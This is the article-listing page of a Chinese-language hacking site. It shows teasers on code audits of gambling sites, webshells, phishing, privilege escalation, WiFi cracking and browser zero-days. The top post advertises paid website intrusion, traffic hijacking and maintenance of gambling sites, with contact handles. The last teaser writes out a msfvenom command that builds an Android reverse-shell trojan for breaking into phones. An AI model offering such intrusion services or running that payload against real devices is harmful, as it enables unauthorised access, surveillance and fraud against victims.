黑客技术教程学习基地 - CNHACK - 中文黑客网 黑客技术教程学习基地 - CNHACK - 中文黑客网

最新文章

黑客技术

九年专业安全团队承接渗透入侵维护服务

中文黑客网 发布于 4-20

承接服务:网站入侵/黑盒,白盒渗透测试/代码审计/流量劫持/GP/BC站点/服务器一条龙维护。BC棋牌站点搭建,提供全天技术支持。九年专业安全技术团队,从业六年BC渗透/维护经验。只接一手单子,二手/中介勿扰谢谢!联系方式:蝙蝠ID:1896028(暂停使用)联系QQ:635948183(注明来意)Telegram:https://t.me/ih...

阅读(60) 评论(0 )

代码审计

对某bc站点的一次代码审计

10

中文黑客网 发布于 4-28

路由分析: 在之前的文章中有写到对于自写框架的代码需要分析路由,这套代码路由就在index中:  其实这段代码光猜就能猜出来他的大概意思,分析过TP的朋友都知道就是:http://127.0.0.1/控制器/方法往下看会发现一个比较重要的地方:  这里用到了反射这个概念,其实在PHP中反射并不常用...

阅读(52) 评论(0 )

黑客技术

linux操作系统入侵检查流程

50

中文黑客网 发布于 4-28

1检查概述由于无法站在攻击者视角审视其做过哪些攻击行为,因此标准化的检查内容可以规避非标准化的风险,例如操作系统虽然没有异常登录日志,但如果不检查操作系统用户即会存在遗漏从而产生风险。同时也可规避上次检查ab内容,本次检查bc内容的非标准化风险。因此无论每个人的标准是否统一,取长补短逐渐完善自己的标准化是建议进行的。linux操作系统入侵检查流程...

阅读(42) 评论(0 )

渗透测试

WEBSHELL与文件上传漏洞

25

中文黑客网 发布于 4-28

这里用dvwa来最简单的讲解下,大佬轻喷~说在前面这里先来简单介绍下文件上传这个漏洞吧漏洞简述:文件上传漏洞通常由于代码中对文件上传功能所上传的文件过滤不严或web服务器相关解析漏洞未修复而造成的,如果文件上传功能代码没有严格限制和验证用户上传的文件后缀、类型等 攻击者可通过文件上传点上传任意文件包括网站后门文件(webshell)控制...

阅读(16) 评论(0 )

代码审计

Fastadmin前台任意文件上传

29

中文黑客网 发布于 4-21

漏洞简介FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。2021年3月28日,360漏洞云漏洞研究员发现,FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件上传,导致RCE漏洞复现在官网上下载fastadmin,利用phpstudy搭建环境根据漏洞描述需要开启支持分片...

阅读(29) 评论(0 )

渗透测试

记一次相对完整的渗透测试

35

中文黑客网 发布于 4-21

教育src700rank了想着继续冲一波分,早日上核心,于是就有了下面这一次渗透测试的过程了。开局一个登陆框,且存在密码找回功能。归属为某教育局开启burp抓取登陆包,发现用户密码并未加密,尝试爆破admin账户密码跑了一下发现报如下错误,看来爆破这条路走不通了。于是fofq查询了一下ip,无旁站。继续肝下一个功能点,密码找回密码找回处可以看出这...

阅读(38) 评论(0 )

黑客技术

红蓝对抗钓鱼篇之从入门到放弃

62

中文黑客网 发布于 4-19

前言上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是APT攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。一、钓鱼小技巧1.1LNK快捷方式lnk文件是用于指向其他文件的一种文件。这些文件通常称为快...

阅读(60) 评论(0 )

黑客技术

这些黑客技术你也能轻松看懂

中文黑客网 发布于 4-18

黑客技术总被渲染的很炫酷。但其实作为普通人的你我也能了解其中的道道。多了解一些,安全上网,保护自己的数据安全。 1、键盘捕获进行键盘捕获而使用的工具中有软件和硬件,都可以把按键顺序记录在日志文件里,还有可能记录个人邮箱和密码。 软件的话比较有名的是Keylogger,主要针对安装的程序来获取按键顺序等信息。而硬件主要通过电磁辐...

阅读(85) 评论(0 )

代码审计

细说变量覆盖那些事

5

中文黑客网 发布于 4-18

前言最近在挖洞和看一些ctf题目中可以看到一些变量覆盖的知识点,之前对这个方面学习的有点不全面,虽然网上有这方面的文章,但是感觉讲的不是很全面,所以就决定写一篇文章来总结这方面的知识。本文涉及相关实验:PHP安全之变量覆盖漏洞  (通过该实验,详细了解PHP中变量覆盖漏洞相关的知识。如:$$使用不当,extract()函数使用...

阅读(33) 评论(0 )

黑客新闻

微信被曝高危0day漏洞,建议立即更新

2

中文黑客网 发布于 4-18

4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe便会加载shellcode执行,整个过程无文件落地,无新进程产生。相关安全团队检测出wechatweb.exe存在内存恶意代码,继而排查出了0day漏洞,并在第一...

阅读(53) 评论(0 )

暂无分类

红蓝对抗提权篇之一文看懂提权

40

中文黑客网 发布于 4-18

一、计算机中的权限1.1不同的权限系统权限在不同的应用中有着不同的分类,与安全相关的大致上我们分为:匿名访问权限来宾权限用户权限管理员权限系统权限不同的权限对应的权力各不相同,我们对自己电脑一般是用户权限和管理员权限。1.2什么情况下用到提权一般会产生提权的原因是因为当前权限无法做到我们需要做到的事情。例如:普通用户权限会有很多限制,无法做到自己...

阅读(35) 评论(0 )

代码审计

探探JDBC反序列化漏洞

6

中文黑客网 发布于 4-18

漏洞复现文章开始,先带大家复现JDBC反序列化漏洞我修改了原文:https://xz.aliyun.com/t/8159 的mysql恶意服务启动代码,如下#-*-coding:utf-8-*-importsocketimportbinasciiimportosimportsysimportsubprocessdefreceive_da...

阅读(25) 评论(0 )

黑客新闻

Chrome和Edge远程代码执行0Day漏洞曝光

2

中文黑客网 发布于 4-16

北京时间4月13日凌晨,安全研究人员RajvardhanAgarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。RajvardhanAgarwal推特截图Agarwal发布的漏洞,是基于Chromium内核的浏览器中V8JavaScript引擎的远程代码执行漏洞,同时...

阅读(29) 评论(0 )

渗透测试

漏洞分析:OpenVAS中的本地提权漏洞

6

中文黑客网 发布于 4-16

写在前面的话虽然本文涉及到的并非一个常见的场景,但如果在渗透测试过程中,你可以通过一个拥有sudo权限的用户来执行OpenVAS的话,你就可以利用本文介绍的技术来实现提权并拿到root。在这篇文章中,我们将介绍ixie关于OpenVAS工作流的内容,然后深入探讨如何利用其中存在的问题实现本地权限提升。OpenVAS工作流背景知识OpenVAS是目...

阅读(22) 评论(0 )

黑客技术

黑客报道:Chrome再次被曝0day漏洞

3

中文黑客网 发布于 4-16

一波未平一波又起,4月13日有安全人员在Twitter上公布了Chrome的0day漏洞PoC。该漏洞可以启动计算器应用程序,一时间好友圈里都被计算器刷屏了。但没想到仅隔一天,在4月14日,Chrome又被曝了第二个0day漏洞。并且其PoC同样也被安全人员在Twitter上公开。据悉,该漏洞影响了Chrome最新正式版(89.0.4389.12...

阅读(33) 评论(0 )

代码审计

php代码审计之PbootCMS漏洞审计

27

中文黑客网 发布于 4-12

PbootCMS漏洞审计一、环境准备下载地址:https://gitee.com/hnaoyun/PbootCMS/releases/V1.2.1解析域名:http://www.pboot.cms/这个系统很方便默认情况下,直接下载下来什么都不用做即可使用。(前提是开启phpsqlite扩展)我们将其改为mysql数据库使用。mysql新建数据库...

阅读(34) 评论(0 )

黑客技术

黑客技术学习:不同黑客入侵网站的基本步骤是什么?

1

中文黑客网 发布于 4-12

如何入侵指定网站,入侵网站应该有什么样的步骤,相信很多朋友都不知道黑客是如何入侵网站的,接下来黑客信息网来给大家科普科普不同的黑客都是怎么样去入侵网站的,首先入侵指定网站是需要条件的,入侵前一定要先观察这个网站是动态还是静态的。介绍下什么样站点可以入侵:我认为必须是动态的网站如ASP、PHP、JSP等代码编写的站点,如果是静态的(.htm或htm...

阅读(94) 评论(0 )

黑客新闻

领英5亿数据被黑客在暗网出售

3

中文黑客网 发布于 4-11

在Facebook5亿数据泄露事件发生后,近日,在某知名黑客论坛有黑客发帖出售5亿领英用户数据,并提供了200万数据记录作为证明。用户只要支付价值2美元的论坛积分就可以查看泄露的数据样本,黑客可能会以4位数字的比特币拍卖更大的5亿领英用户数据库。4个泄露的文件中包含有领英用户的信息,包括全名、邮件地址、手机号码、工作地址等信息。发帖者称数据是从领...

阅读(86) 评论(0 )

黑客技术

aircrack-ng无线网WIFI破解教程

11

中文黑客网 发布于 4-9

一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-ng为例,这是一个很强大且具有代表性的工具,网上很多其他的破解工具都是基于aircrack-ng的。名词解释无线AP:发射...

阅读(149) 评论(0 )

黑客技术

使用kali生成木马入侵安卓手机

7

中文黑客网 发布于 4-9

行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/apk.apk5555是设置的端口,可以自己更改  显示这个说明已经生成成功了 然后启动msf...

阅读(116) 评论(0 )

sitemap